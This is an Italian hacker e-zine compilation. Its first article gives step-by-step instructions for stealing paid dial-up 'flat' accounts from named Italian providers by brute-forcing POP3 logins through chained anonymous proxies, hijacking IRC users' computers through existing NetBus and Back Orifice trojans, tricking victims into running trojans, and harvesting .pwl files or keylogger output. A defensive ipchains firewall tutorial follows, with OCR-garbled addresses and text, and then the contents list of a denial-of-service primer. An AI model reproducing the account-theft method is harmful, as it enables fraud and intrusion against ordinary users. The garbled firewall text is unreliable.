Tutto quello che scriverò qui sotto,sarà solo a scopo informativo,quindi se qualunque
persona,e ripeto QUALUNQUE,si mette nei guai a causa di questo testo,io non mi ritengo responsabile.
Il mio compito è quello di rendere pubblico alle persone i problemi della rete,e non di mettere in atto truffe a sproposito....
Io non incito nessuno a usare questa tecnica a scopo di lucro,se qualcuno alla lettura di questo testo si
potrebbe sentire offeso,cancelli subito questo file's dal suo Hard Disk e non venga a far proteste alla mia mail.
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
Dopo tanto tempo di sosta,ho deciso di tronare a scrivere un nuovo articolo.
In questa fase di assenza ho imparato molte altre cose,e come sempre cercherò di
informarvi al meglio.
Oggi ho deciso di parlarvi di un'argomento delicato,cioè le famigiarate FLAT.
Prima di iniziare ci vuole un po di teoria.Mica volete fare come i lamer che vogliono sapere
come mettere in atto tecniche senza capire cosa stanno facendo?
Certo che no!!!
Allora iniziamo....
...Siamo in un'epoca dove contano molto i soldi e internet si stà sempre di +
commercializzando.Diciamo la verità,cerchiamo sempre il modo x risparmiare,al
supermercato,al mercato,nei negozi di abbigliamento,nella bolletta della luce,del gas,
del telefono ecc....
Questo xchè?
Forse xchè vogliamo mettere dei soldi da parte,forse xchè siamo tirchi,forse xchè
le tasse sono troppo alte,bah..chi lo sà.....ognuno ha la sua opinione e
modo di fare.
Prendiamo x esempio la bolletta del telefono,ditemi uno di voi a cui non è mai venuta
una bolletta superiore a 500.000(x dire un cifra bassa)?
X i patiti della rete,credo che la risposta sia:Io ho dovuto vendere la casa x
pagare la bolletta!!! :)))(naturalmente scherzo :)))).
Quindi quali sono i modi x alleggerire sta benedetta bolletta?
Direi che ci sono 5 metodi:
1)Connettersi tramite dei green(cosa sono e come si usano magari lo spiego
in un'altro articolo x i + disinformati(senza offesa!!).
2)Installarsi un'impianto x adsl o isdn.(Potrebbe essere una buona scelta:
Paghi un tot di canone ogni 1 o 2
mesi(quindi non si paga gli scatti sulla bolletta),hai la linea del telefono
libera,e si "naviga + veloci del solito 56K :)
3)Abbonarsi ad un provieder che offre servizi Flat.(Paghi un tot. al mese ma la
linea telefonica rimane occupata)
4)Abbonarsi a qualche offerta della propia azienda telefonica a cui siete abbonati.
(Non ci sono grandi
offerte,ma qualche soldino in + si risparmia:)))
5)Attacchiamo la nostra linea telefonica a quella del vicino di casa:)))))
(Questa la eviterei ahahahahahah).
Esaminando i 5 casi,possiamo vedere che di opportunità c'è ne sono,ma se uno non si
può permettere neanche queste?
Bhè,prendiamo in considerazione le Flat.
Ma cosa sono le Flat?
Le flat non sono altro che dei numeri verdi,dove ci si può connettere tramite dei
propi account,quindi non paghi la bolletta.Mà(c'è sempre un mà nella vita pultroppo)
bisogna pagare un tot. di soldi ogni 2 mesi tramite carta di credito o tramite banca.
OK,ora voi penserete:Ma se uno non se lo può permettere che caxxo parli a fare?
State calmi,adesso arriva il bello.
Se uno riesce ad impossessarsi di un'account di una flat cosa succede???
Bhè....potete immaginarlo,cmq x i + duri di testa,dato che l'accoutn viene pagato ogni 2 mesi
dal propetario(dell'account),chi lo usa "naviga" a scrocco,cioè non paga un caxxo.
Ok,adesso dopo un pò di introduzione,passiamo nella fase calda di questo testo :)
Il metodo che riporterò qui sotto,è possibile a causa della distrazione degli abbonati(alle
flat)e la poca sicurezza data dai provider.(Mi spiace dirlo,ma quando ci vole,ci vole).
Allora prendiamo come esempio l'azienda edisons(www.edisons.it).
Naturalmente è un servizio di flat,xò ha un problema(veramente ne ha + di uno),cioè fa
scegliere all'abbonato l'username e passwd dell'account,al momento della registrazione.
Vuoi che non esista la persona fessacchiotta che non usa username e passwd uguali?????
Certo che esiste,sennò non ero qui a scivere :)
Quindi x trovare un'account bisogna utilizzare la tecnica di brute-force.
Il metodo consiste nel collegarsi al servzio pop3(posta in entrata)del server,
e con una word-list(testo con moltissime parole)provare a trovare l'usrname e passwd di
un'account.
E qui scatta il secondo errore della edisons,mette l'indirizzo di mail uguale al login
dell'account.
Allora,prima di tutto bisogna attrezzarsi,abbiamo bisogno di 1 prog. x brute force,una
word-list,1 prog. x proxy anonimi,una lista di proxy anonimi,2 informazioni.
Di brute-force,consiglio wwwhack(www.wwwhack.com),anche xchè in questo testo utilizzerò
questo x fare l'esempio.L'info. che dobbiamo trovare si tratta dell'indirizzo di pop dele
server e il numero del provider.
Andiamo nel sito di edisons,e vediamo ti trovare questo benedetto indirizzo di pop e il
numero di tel.
Cerchiamo nelle pagine di aiuto,o di risposta ai problemi...cerchiamo...cerchiamo...
cerchiamo...(guaradre anche la sezione e-mail)finchè bingo!!!
Eccoli quà " mail.edisons.it " e il numero di tel. è " 800101818 ".OK adesso bisgona
trovare trovare una word list ITALIANA.
C'è ne sono tantissime in rete,quindi non avrete problemi a trovarle.
Poi cerchiamo anche una lista di proxy ANONIMI,anche questi non dovrete avere problemi
a cercarli.
Infine cerchiamo un programma che faccia il redirect dei proxy,che lo trovate al sito
" http://proxy.nikto.net ".
Cosa sia un redirect dei proxy,e come si usa questo programma lo spiegherò dopo.
Adesso che abbiamo tutto l'occorrente,mettiamoci a lavoro.
Apriamo il wwwhack.Sopra,nella barra dei menù,cerchiamo la voce "option".Si trova vicino
ad "Access".
Clikkiamoci sopra,e si aprirà un menù a cascata.Clikkiamo su "Proxy Setup".
Adesso selezioniamo l'opzione "Always use this proxy" e su Hostname mettiamo
127.0.0.1 e su port mettiamo 8088 (tra poco spiegherò il xchè).
X ora chiudiamo il wwwhack.
Ok,adesso che abbiamo settato il proxy,dobbiamo configurare il programma Multi Proxy.
Allora,Multi proxy è un programma che fa il redirect,cioè tutti i comandi che noi mandiamo
al server,e le risposte(del server)vengono filtrate da tutti i proxy che sono addati nella
lista del programma,con la tecnica dei proxy incatenati.Cioè proxy 1 si collega al 2,il 2
al proxy 3 ecc. fino a che l'ultimo proxy non si collega al server desiderato.
Adesso apriamo il multi proxy,nel riquadro del programma,sulla destra vediamo il bottone
di nome Options.
Clikkando si aprirà un'altro menù,e noi andiamo su "Proxy server list" .
Adesso vediamo un bottoncino di nome "Menù -->" ,clikkiamo,e sul menù a cascata che si apre,
passiamo con il mousu sulla voce "File",si aprirà un'altro menù a cascata dove noi clikkeremo
su "Import proxy list" .
Adesso selezioniamo il nostro file.txt contenente dei bei proxy anonimi e clikkiamo su OK.
Adesso controlliamo l'anonimità dei proxy,clikkando sul bottone "check all" all'avvio del
programma.
Bisogna fare attenzione ad alcuni server che non fanno fare la verifica di anonimità,quindi
anche se sono anonimi,noi non c'è ne potremmo accorgere.
Adesso vi spiego xchè nel wwwhack abbiamo settato ip:127.0.0.1 port:8088 nel setup dei proxy.
Tutto questo xchè il programma riconosce il nostro server,con il nostro ip di default,cioè
127.0.0.1 usando la porta 8088.
Quindi,anche se noi vogliamo usare questo(Multi Proxy) programma x navigare sul web,quando
settiamo il proxy,dobbiamo mettere a ip:127.0.0.1 e a port:8088 .
Spero che abbiate capito,sennò mandatemi una mail dove vi risponderò con calma.
Allora,prepariamoci all'attaco.
Apriamo multi proxy,e minimizziamolo sulla barra di stato.
Adesso apriamo il wwwhack.In alto accanto a File , c'è il bottone di nome "Acces".
Clikkiamoci sopra,e sul menù a cascata che ci apparirà,clikkiamo su Pop3.
Adesso ci compare una schermata dove dovremo mettere vari settaggi.
Partiamo dall'alto.
Su "host:" mettiamo l'indirizzo di pop3,quindi mail.edisons.it
Su "Username" selezioniamo la voce "Use this File" e su clikkando Browse,andiamo
a ricercare la nostra word-list di nomi italiani.Premiamo OK e proseguiamo.
Su "Password" selezioniamo l'opzione "Always user the same as username"
Facendo così,il brute proverà combinazioni con username e passwd uguali.(ad esempio
username:xfxfxf password:xfxfxf e così via)
Dopo non ci rimane che deselezionare un'opzione in basso.
Dove c'è scritto "Skip after finding one password" dobbiamo togliere la virgoletta
dentro il quadratino propio accanto alla scritta.
Mentre il secondo "Skip to next username after finding the password" lo lasciamo invarito.
Adesso premiamo OK,e i 2 programmini cominceranno a lavorare(Multi Proxy e wwwhack).
Noteremo che Multi Proxy filtra i comandi che il wwwhack stà facendo tramite il brute
force,e la risposta del server.
Dopo aver aspettato che il il brute termina di provare tutti gli username della word-list,
con grande gioia noteremo che abbiamo ottenuto dei bei account interamente a scrocco.
Dopo creeiamo un nuovo accaunt di accesso remoto,e al numero di telefono mettiamo 800101818
e a username e password quello che abbiamo ricavato dal brute.
Premiamo connetti,aspettiamo che la connessione viene accettata..eeee....BINGO!!
Adesso abbiamo un bel account su edisons.
Ma se troviamo dei provider(che offrono falt)un pò + organizzati?
Ad esempio galaflat (www.galactica.it) è organizzata un pò meglio alivello di sicurezza.
Cioè,al momento dell'iscirzione dell'account,non ti fanno scegliere l'username,ma soltanto
la password.
Gli username li gestiscono loro,quindi al momento della registrazione ti affibbiano un username composto dalla parola galaflat e numeri.
Ecco un'esempio di username " galaflat.123456 " (senza apici naturalmente).
Oltre a questa prevenzione,c'è nè un'altra,cioè non mettono l'username dell'account uguale
all'indirizzo di posta.Questo lo fanno scegliere al propetario al momento della registrazione.
Quindi,se una mail è ciao@galactica.it ,non vuol dire che ciao è l'username dell'account.
Quindi la tecnica del brute-force sul pop3,qui non può funzionare.
All'ora come facciamo se vogliamo fottere qualche bella pass ad utenti abbonati a queste flat
un pochino + organizzate?
Semplice,dobbiamo sempre contare sulle persone + disattente.
Un luogo pieno di persone che si fanno imbacuccare facilmente?
Semplice,le chat su IRC!
Allora,entriamo nei canali + affollati e dove c'è + traffico di scambio dati.Sicuramente
state pensando a quelli porno,e sinceramente avete ragione.
X una volta,quei caxxo di script x mirc servono a qualcosa,ad esempio pizza scipt,venom,
dynamirc,ecc...
Dico questo xchè c'è un'opzione utile,cioè quella dei trojan scan.
Facciamo un trojan scan in un canale affollato,e vedrete che troverà molti ip infetti da
vari trojan.(maggiormente net-bus e back-orfice)
Fra la lista degli ip infetti dobbiamo cercare quelli che finiscono con flat.galactica.it .
Appena ne trovate uno,prendete la consolle del trojan e collegatevi all'ip infetto.
Solitamente chiede una pass,ma ci sono molti bug con cui si può superare il problema password.
Altrimenti dovete voi prendere x il sellino la gente e spedire la patch del trojan
inventandogli una caxxata.Ad esempio dicendogli che gli mandate filmati xxx e invece gli rifilate la patch.
Ok,adesso che siamo collegati all'ip del tizio,entriamo nella directory c:\windows\ e
cerchiamo il file dove vengono archiviate gli account delle connessione se vengono salvate,
cioè i file .pwl
Ma se il tizio non salva le password al momento della connessione?Facile,usiamo un bel
keylogger,cioè un programma che logga tutto quello che scrive la tastiera,o preferibilmente
solo le passwd,riponendole in un file specifico.
Usando uno dei 2 metodi riportati qui sopra otterremmo 2 cose:
O il file .pwl da crakkare
O il file del keylogger con l'accoutn già crakkato e pronto x l'uso.
Se si ottiene il file .pwl ,ci scarichiamo un crakkatore x file .pwl(consiglio Pwlhack)e
dopo aver crakkato il tutto otterremmo l'account e anche il numero di tel. con cui collegarsi.
Mentre se otteniamo il file del key logger con solo login e passwd,andiamo nel sito
www.galaflat.it e cerchiamo tra le info il numero di tel.(800410001)
Naturalmente uno è comodo di scegliere uno dei 2 metodi.
Dopo ci creeiamo un'altra connessione su accesso remoto,mettiamo i dati,e ci colleghiamo.
Quindi avremo un'altro account di flat....
Naturalmente ognuno può usare una sua tecnica x procurarsi il file .pwl,tipo quella
dei computer net-biossati.
Io ne ho citate 2 facili da applicare,ma naturalmente c'è ne sono vari...
Ah,c'è un'altra cosa importante da dire,cioè sulla questione multi utenza delle flat.
Non sò sinceramente se è possibile collegarsi ad un'accoutn con diverse persone(cioè + di
una),cmq tramite accertamenti e voci arrivatemi,si dice che possono essere multi utente.Se sapete qualcosa a riguardo,scrivetemi x riferirmelo.
Adesso vi devo propio lasciare,anche xchè ho un po di fame :PpPp
Ah,se trovate errori nel testo,riferitemelo x mail o in chat,grazie!
Ciao da SPYRO
Saluti:mR_bIs0n(Mio fratellone:),AtlaWare,Bakunin(Mio Maestro :),Spawn,BsTHaCk,Anubi,
Radion,la Jessica mmm ops ;)ho sbagliato Rad?,Warning,Terror,Gouranga,Blender,Prodigy,
Hiloz[83],Memorik,Hedo,e tutti quelli che ho dimenticato di #phreak.it(scusatemi).
Poi
saluto tutti gli Spippolatori,in particolare il grande Master e Chrome.Infine saluto
tutti quelli che mi vogliono bene :) e quelle presunte persone che hanno fottuto i sorgenti
di win e di office alla microsoft.
Fuck:Un Fanculo a tutti quelli che mi vogliono male e mi mettono i bastoni
far le ruote.Un grande FUCK alla SCUOLA che dopo appena 2 mesi di apertura,mi
ha già rotto il caXXo!,ai PEDOFILI di merda e al Grande Fratello che mi stà tanto sul culo!!!!
Mail:spyro2600@yahoo.it
Irc: #phreak.it #hack.it
Url Sito: Http://www.spyrohack.com
-+--+ -+--+
INSTALLAZIONE DI UN FIREWALL
Il firewall è ,quasi certamente , lo strumento di sicurezza informatica che
gode di fama maggiore tra le masse.Un altro primato del firewall è quello
di essere ,in assoluto,uno degli strumenti che danno una forte
"sensazione di sicurezza",spesso non giustificata.Per la logica comune ,se
un host ha problemi di sicurezza,installando un firewall si risolve tutto:nulla di
piu' falso.Esistono piu' tipi di firewall,ma tutti,a prescindere dal tipo,dalla marca
e dalla configurazione non sono altro che dei filtri.Spesso i firewalls sono classificati
in due tipi:i proxy ed i packet filtering.Quello che differenzia queste due tipologie di
firewalls è il livello a cui filtrano:i firewalls proxy filtrano a livello dell'applicazione
mentre i packet filtering filtrano a livello di trasporto e di rete.I packet filtering sono
in assoluto i piu diffusi ,poichè anche se forniscono una protezione minore,sono estremamente
piu'flessibili.L'altra motivazione che ha decretato il poco successo dei firewalls proxy è
il fatto che la tendenza moderna della sicurezzqa informatica è quella di affidare il compito
di "filtrare" il livello applicativo all'applicazione stessa.Per tutte queste ragioni questo
testo tratta dei packet filtering.Per arricchire la teoria con qualche applicazione saranno
presentati degli esempi utilizzando "ipchains" e dunque il firewallin del kernel 2.2.x del
sistema operativo Linux.
-+-+IL CONCETTO DI REGOLA-+-+
Il firewall è un filtro e quindi ,per poterlo utilizzare bene , è necessario
conoscere perfettamente quello che si intende filtrare.Questa scelta è fondamentale
e determina l'efficacia del firewall.Nel caso dei firewall proxy ad essere filtrati
sono i pacchetti in entrata e quelli in uscita.Un buon firewall ci dà la possibilita'
di decidere la sorte dei pacchetti in base alle seguenti caratteristiche:
Protocollo IP:
-indirizzo sorgente
-indirizzo di destinazione
-opzioni IP(non sempre purtroppo)
-protocollo
-frammentazione(bit more fragment settato?
Protocollo ICMP:
-tipo ICMP
-codice ICMP
Protocollo UDP/TCP:
-porta sorgente
-porta destinazione
-flags:SYN.ACK ecc. (solo TCP)
Alcuni firewalls,come ad esempio ipfilter (probabilmente il migliore in assoluto),
permettono di filtrare i pacchetti in relazione a tutti i campi dei protocolli
supportati ,anche in base allo " stato" delle connessioni.Anche se ipchains non raggiunge
questo livellodi dettaglio,costituisce un ottimo passo in avanti nei confronti del vecchio
ipfwadm (in effetti ipchains ed ipfwadm sono i nomi dei programmi utilizzati per settare le
regole.Parlando di "ipchains" si fa riferimento al firewalling del kernel 2.2,mentre "ipfwadm"
indica il firewaling del kernel 2.0)La configurazione di un firewall non è altro che la
definizione delle "regole" che determineranno la sorte del pachetto.Eccovi un esempio di
regola:
Blocca tutti i pacchetti TCP uscenti destinati alla porta 80 dell'host www.microsoft.com
Per inserire questa regola con ipchains dovete eseguire il seguente comando (da root):
# ipchains -A output -d www.microsoft.com 80 -p TCP -j DENY
Dopo l'inserimento di questo comando ,accederete alle pagine web del sito www.microsoft.com
diverra'impossibile (la porta 80 TCP è proprio la porta sulla quale è in "ascolto" il
demone httpd) .Bloccando tutti i pacchetti destinati a quella porta,per il vostro host
sara'impossibile inoltrare la richiesta necessaria per visionare le loro pagine web.Vediamo
meglio il comando appena digitato:l'opzione -A d'ipchains indica di "appendere" la regola
alla fine della lista delle regole, output specifica che la regola si riferisce ai soli
pacchetti uscenti mentre l'opzione -d indica l'indirizzo di destinazione di questi,in altre
parole il campo destinazione del protocollo IP,ed è seguito da "80" ,che nel caso del
protocollo TCP indica che la porta di destinazione è appunto la 80.L'opzione -p indica il
protocollo dei pacchetti ,in altre parole il campo "protocol" dell'IP,infine l'opzione -j
indica come comportarsi con quel dato pacchetto ,in questo caso l'operazione richiesta è
"DENY" ,ovvero il pacchetto verra' semplicemente scartato.E' da notare che da quando per
destinazione si utilizza il nome di un host (invece che l'indirizzo IP) saranno aggiunte
tante regole uguali per tutti gli indirizzi in cui tale nome risolve.Un esempio puo'chiarire
meglio il concetto:
$ nslookup www.yahoo.com
Server: dns.tin.it
Address: 194.243.154.62
Non-authoritative answer:
Name: www.yahoo.com
Address: 204.71.200.67, 204.71.200.68, 204.71.200.75, 204.71.200.74
Com'è possibile osservare il nome www.yahoo.com risolve in piu' di un indirizzo IP.E' per
questo che digitare il comando:
$ ipchains -A output -d www.yahoo.com 80 -p TCP -j DENY
Equivale a digitare i seguenti quattro comandi :
# ipchains -A output -d 204.71.200.67 -p TCP -j DENY
# ipchains -A output -d 204.71.200.68 -p TCP -j DENY
# ipchains -A output -d 204.71.200.75 -p TCP -j DENY
# ipchains -A output -d 204.71.200.74 -p TCP -j DENY
La forma con il nome dell'host è preferibile:nel caso gli indirizzi IP di www.yahoo.com
venissero modificati la riga di comando necessaria rimarrebbe immutata.
Un'alternativa valida puo' essere il seguente comando:
# ipchains -A output -d 204.71.200.0/24 80 -p TCP -j DENY
Che indica ad ipchains di bloccare qualunque pacchetto diretto verso la porta 80 di tutti
gli Indirizzi IP the possiedono almeno i 24 bit plu a sinistra uguali a 204.71.200.0
(ovvero gli indirizzi 204.71.200.0, 204.71.200.1, 204.71.200.255).
CEO equivale a dire che saranno bloccati tutti gli accessi verso la porta 80 di quella
'Classe C' (per informazioni suite classi degli indirizzi IP si consiglia la lettura del
NET3-HOWTO).
-+-+LA RELAZIONE TRA LE REGOLE-+-+
Un concetto molto importante è quello della relazione tra le regole. Sì Supponga un host
su Internet, che nasconde una rete locale. Questo host ê per l'internet un server www, ma
per I rete locale è anche un server ftp. Noi desideriamo che l'accesso a ftp sia garantito
Solo dall'interno ovvero dalla rete locale, mentre dall'esterno dove essere visibile solo ls
httpd. Supponiamo che lo scenario sia quel dl figura.
Come potete vedere PC1, PC2, PC5 sono i client sulla rete locale. Anche il Server fa parte
della rete locale ma ha due interfacce, una con un indirizzo locale e l'altra con un
indirizzo pubblico.
|-------|
| |-------------|
| PC1 | |
|-------| |
|
|-------| |
| | | ______________
| PC2 |-------------| | |
|-------| | | |
| | |
|-------| | | SERVER |
| | | | |
| PC3 |------------------ | |--------------- INTERNET
|-------| | | FIREWALL |
| | |
|-------| | | |
| | | | |
| PC4 |-------------| |_____________|
|-------| |
|
|-------| |
| | |
| PC5 |-------------|
|-------|
ammetta che Ia rete locale Sia 1g2,168.L.O e che l'indirizzo pubblico sia 195.120.28.100.
Quello che serve e semplice: si desidera che da internet sia accessibile solo II
web server e che dalla rete locale sta accessibile anche Il server ftp. Una soluzione
potrebbe essere quella di usare le seguenti regole:
. accetta tutta i pacchetti entranti provenienti dalla rete locale e diretti verso la porta ftp del server
. blocca tutti i pacchetti entranti destinati alla porta ftp del server
Ovvero:
# ipchains -A input 195.168.2.0/24 -d 195.120.28.110 21 -p TCP -j ACCEPT
# ipchains -A input 195.120.28.100 21 -p TCP -j DENY
Queste due regole permettono di capire In che modo ipchains (e molti altri firewalls)
processa le regole e dunque la relazione né tra le regole stesse. Quando Un pacchetto
arriva II firewalling di linux controlla Se questo riguarda la prima regola della lista
di regole inserite Nel caso in cui il pacchetto corrispondesse, verrebbe eseguita
l'operazione che la regola specifica (nel nostro caso ACCEPT), altrimenti si passerebbe
alla regola successiva (questo dà l'idea di quanto il firewalling affatichi Ia nostra
CPU, in presenza di molte regole e di elevati traffici) e così via. E per questo che le
due regole sopra riportate funzionano. Immaginate un pacchetto TCP proveniente dalla rete
locale e destinato alla porta 21 del server. Un tale pacchetto interesserà la prima regola,
infatti l'indirizzo di provenienza rientra in 192.168.1.0/24 e quello di destinazione è
proprlo 195.120.28.110, come Ia porta di destinazione è appunto la
21, ovvero quella dell'ftp il kernel eseguira' l'operazione descritta dalla prima regola :
ACCETT il pacchetto sarà accettato e tutte le altre regole Ignorate. D'altra parte un
pacchetto to TCP proveniente da un qualunque altro indirizzo di Internet C diretto alta
porta 21 del nostro server non soddisfera' Ia prima regola, infatti l'indirizzo sorgente
non corrisponderà (spoofing permettendo, ma è un aftro discorso con
192 168.1.0/24.
II confronto proseguirá prendendo in esame la seconda regola, che dice dl bloccare qualunque
pacchetto destinato alla porta 21 del server. In questo caso il pacchetto ha tutti i requisiti
richiesti e l'operazione DENY sarà eseguita, cosi il pacchetto verrà scartato.
Le due regole presentate sopra non sono dl certo le migliori:
non danno un grosso margine di sicurezza poiché filtrano solo I pacchetti diretti alla
porta 21. Ammettendo che per un erro re il servizio telnet non sia stato rimosso dal server,
questo continuerà ad essere accessibile da parte dl Internet. Un insieme di regole piu'
"selettive" è il seguente:
. accetta I pacchetti TCP entranti provenienti della rete loca le e diretti alla porta
21(ftp) e 20(ftp-data) del server
. accetta I pacchetti TCP entranti provenienti da qualunque destinazione diretti alla
80(web) del server
I blocca tutti I pacchetti TCP entranti dire W alle porte da 0 a 1024 del server
(In modo da proteggere tutti gli eventuali altri servizi che "ascoltano" su una porta
privilegiata).
Ovvero:
# ipchains -A input -s 192.168.2.0/24 -d 195.120.28.100 21 -p TCP -j ACCEPT
# ipchains -A input -s 192.168.2.0/24 -d 195.120.28.100 20 -p TCP -j ACCEPT
# ipchains -A input -d 195.120.28.100 80 -p TCP -j ACCEPT
(ri.b. omettendo -s l'indirizzo sorgente viene impostato a 0/0, dunque 18 regola sarà va/Ida
per gli ip con Qualunque indirizzo sorgente)
Coadiuvando questi brevi esempi con Ia man page di ipchains sarete capaci di sfruttare al
massimo le potenzialità del firewalling del kernel 22, ed alla fine riuscirete a filtrare
qualunque pacchetto IP, UDP, TCP ed ICMP (limiti di ipchains permettendo).
-+-+COSA FILTRARE IN UN CONTESTO REALE-+-+
Imparare ad usare bene un determinato firewall cosi da essere In grado di filtrare In maniera
selettiva qualunque tipo di pacchetto non basta (ma è una condizione necessaria) per garantire
il funzionamento ottimale: serve sapere cosa ti pare. Se pensi al caso specifico di un
firewall "orientato" all'host, ovvero the protegge solo ed esclusivamente 'host su cui e
installato; è II caso semplice poichè I firewalls che proteggono Intere reti sono dl piü
difficile comprensione e mettano Un articolo a parte.
Esistono anche casi molto complessi ed articolati, come le DM2, che saranno trattate in
futuro su queste pagine. Come dicevamo l'esempio riguarda H classico host su Internet che
fisicamente il computer su cut girano I servizi dl rete ed anche quello su cui gira II
firewall stesso.
Immaginiamo che su questo ipotetico host siano presenti sol tanto il servizIo di ftp anonimo
ed il server dns. La scelta dei demoni è importante almeno quanto il firewalling :
In questo caso sarebbe consigliabile installare un ftp che permette solo l'accesso anonimo,
ne esiste uno molto buono di Marcus j Ranum. Per Il server dns useremo certamente il
classico bind. Le nostre regole dovranno permettere l'accesso da parte dl tutta Internet
verso la porta 20 e 21 del protocollo TCP e versa a porta 53 del protocollo UDP deII'host.
Ipotizzando che il nostro host non abbia altro scopo oltre quello di far girare questi due
demoni potremmo pensare alla seguenti regole:
La - bloccare in entrata tutti I pacchetti con indirizzo Ip sorgente 127.0.0.0/8
lb - bloccare in entrata tutti I pacchetti con indirizzo Ip sorgente uguale al nostro p.
ic - bloccare in entrata tutti I pacchetti con indirizzo Ip sorgente uguale a 192.168.1.0/24
2a - accettare in entrata I pacchetti TCP verso Ia porta 21
2b - accettare in entrata I pacchetti TCP verso Ia porta 20
2c - bloccare in entrata I pacchetti TCP versa le porte da 0 a
1023
2d o bloccare In entrata i pacchetti TCP con il solo flag SYN settato verso le porte
da 1024 a 65535
3. - accettare in entrata I pacchetti UDP versa a porta 53
3b . bloccare in entrata i pacchetti UDP verso le porte da 0 a
1023
4. - permettere In entrata I pacchetti ICMP di tipo 3, 4 e 11
4b - bloccare In entrata tutU i pacchetti ICMP
4c - permettere in uscita i pacchetti ICMP di tipo 4
4d - bloccare In uscita tutU i pacchetti ICMP
NB. Esaminando queste regole non dimenticate il modo In cui sono processate!
Vediamo di capire il perché di queste regole. Le regole la e lb servono a prevenire lo
spoofing dei pacchetti: non ce alcun motivo di accettare pacchetti provenienti dall'indirizzo
th Ioopb.ck, dal nostro stesso ip a dagli ip della nostra rete locale (se mai ce ne fosse una).
Ricordate che le seguenti regole devono essere specificate utilizzando l'opzione -i di
ipchains specificando l'Interfaccia con cut siamo connessi ad Internet., infatti, non
specificando I'Interfaccia queste regole avrebbero Iteffetto indesiderato dl non permettere
le con-nessioni originate da quegli ip neppure nel caso fossero legittime. Le regole 2a e 2b
permettono le connessioni verso le porte del servizio ftp, mentre le regole 2c e 2d bloccano
rispettivamente ogni tipo di accesso alle porte TCP privilegia te (da 0 a 1023) e inizio di
una connessione verso le porte non privilegiate da 1024 a 65535 (SYN flag settato).
Una piccola nota, Ia regola 2d costringerà ad usare I clients
ftp dell'host in passive mode. La regola 3a permette l'accesso al server dns, mentre Ia
regola 3b blocca l'accesso a tutte le porte UDP privilegiate. Le regole 4a e 4b si occupano
di permettere l'accesso ai soli pacchetti ICMP di tipo destina
tlon unreachable, source quench e time exceeded : tran ne rail casi E utile non filtrare
questi pacchetti almeno in entrata. Infine le regole 4c e 4d permettono in uscita solo gli
ICMP di tipo source quench. Qualcuno potrebbe non essere d'accordo sul l'atto di bloccare
il tipo 3 in uscita. In effetti biso gna valutare di volta in volta. Per un host su cui
girano solo ftp e dns mi pare una buona scelta, ed è un modo efficace per bloccare li scan UDP.
-+-+CONCLUSIONE-+-+
Scegliere adeguate regole di firewalling non è una cosa semplice perché non è un processo
sdiematlco. Ogni caso è diverso dall'altro e si deve 5cegllere un compromesso tra lies
eibilità e sicurezza. Non ci sono regole di firewalling adeguate se chi le implementa non
conosce in maniera approfondita il TCP/IP ed i protocolli del servizi the girano sull'host.
Net caso di flrewalls che proteggono intere reti le cose sono piü complesse. Solo una attenta
valutazione e dei test accurata possono portare ad una configurazione che aumenta redililente
la sicurezza globale delta rete protetta. ~.
Syn^ sYn^]|[ ---> syn@hackersat.com <---> w w w . h a c k e r s a t . x s 3 . c o m <---
Hans Husman
t95hhu@student.tdb.uu.se
Ultimo aggiornamento: Lunedì 28 Ottobre 14:56:31 1996
Tradotto da: Kewl ( kewl@penguin.it )
===================================
=INTRODUZIONE AI DENIAL OF SERVICE=
===================================
.0. PREFAZIONE
.A. INTRODUZIONE
.A.1. COS'è UN ATTACCO DENIAL OF SERVICE?
.A.2. PERCHè QUALCUNO DOVREBBE MANDARE IN CRASH UN SISTEMA?
.A.2.1. INTRODUZIONE
.A.2.2. STATO SOTTOCULTURALE
.A.2.3. PER GUADAGNARE L'ACCESSO
.A.2.4. VENDETTA
.A.2.5. RAGIONI POLITICHE
.A.2.6. RAGIONI ECONOMICHE
.A.2.7. CATTIVERIA
.A.3. ALCUNI SISTEMI OPERATIVI SONO PIù SICURI?
.B. ALCUNI OBBIETTIVI DI BASE PER UN ATTACCO
.B.1. SPAZIO SWAP
.B.2. FREQUENZA
.B.3. TAVOLE DEL KERNEL
.B.4. RAM
.B.5. DISCHI
.B.6. CACHE
.B.7. INETD
.C. ATTACCARE DALL'ESTERNO
.C.1. AVERE PROFITTO CON IL FINGER
.C.2. UDP E SUNOS 4.1.3.
.C.3. BLOCCARE X-WINDOWS
.C.4. USO MALIZIOSO DEI SERVIZI UDP
.C.5. ATTACCARE CON I CLIENTS LYNX
.C.6. USO MALIZIOSO DI telnet
.C.7. USO MALIZIOSO DI telnet SU SOLARIS 2.4
.C.8. COME DISABILITARE GLI ACCOUNTS
.C.9. LINUX E TCP TIME, DAYTIME
.C.10. COME DISABILITARE I SERVIZI
.C.11. PARAGON OS BETA R1.4
.C.12. FTP DI NOVELLS NETWARE
.C.13. ATTACCHI CON REINDIRIZZAMENTO DI ICMP
.C.14. TEMPESTE DI BROADCAST
.C.15. EMAIL BOMBING E SPAMMING
.C.16. TIME E KERBEROS
.C.17. IL BUG DOT DOT
.C.18. SUNOS KERNEL PANIC
.C.19. APPLESTS OSTILI
.C.20. VIRUS
.C.21. ABUSO DI FTP ANONIMO
.C.22. SYN FLOOD
.C.23. PING FLOOD
.C.24. MANDARE IN CRASH I SISTEMI CON IL PING DI WINDOWS 95
.C.25. USO MALIZIOSO DEL MESSAGGIO DI RISPOSTA DELLE SUBNET MASK
.C.26. FLEXlm
.C.27. PARTIRE CON FTP BANALI
.D. ATTACCARE DALL'INTERNO
.D.1. KERNEL PANIC SOTTO SOLARIS 2.3
.D.2. BLOCCARE IL SERVER X
.D.3. RIEMPIRE L'HARD DISK
.D.4. USO MALIZIOSO DI eval
.D.5. USO MALIZIOSO DI fork()
.D.6. CREARE FILES CHE SONO DIFFICILI DA RIMUOVERE
.D.7. DIRECTORY NAME LOOKUPCACHE
.D.8. ATTACCO CSH
.D.9. CREARE FILES IN /tmp
.D.10. USARE RESOLV_HOST_CONF
.D.11. SUN 4.X E LAVORI NASCOSTI
.D.12. MANDARE IN CRASH DG/UX CON ULIMIT
.D.13. NETTUNE E HP-UX
.D.14. SOLARIS 2.X E NFS
.D.15. STABILITà DEL SISTEMA COMPROMESSA CON MOUNT_UNION
.D.16. trap_mon CAUSA IL KERNEL PANIC SOTTO SUNOS 4.1.X
.E. DUMPING CORE
.E.1. BREVE COMMENTO
.E.2. USO MALIZIOSO DI NETSCAPE
.E.3. CORE DUMPED SOTTO WUFTPD
.E.4. ld SOTTO SOLARIS/X86
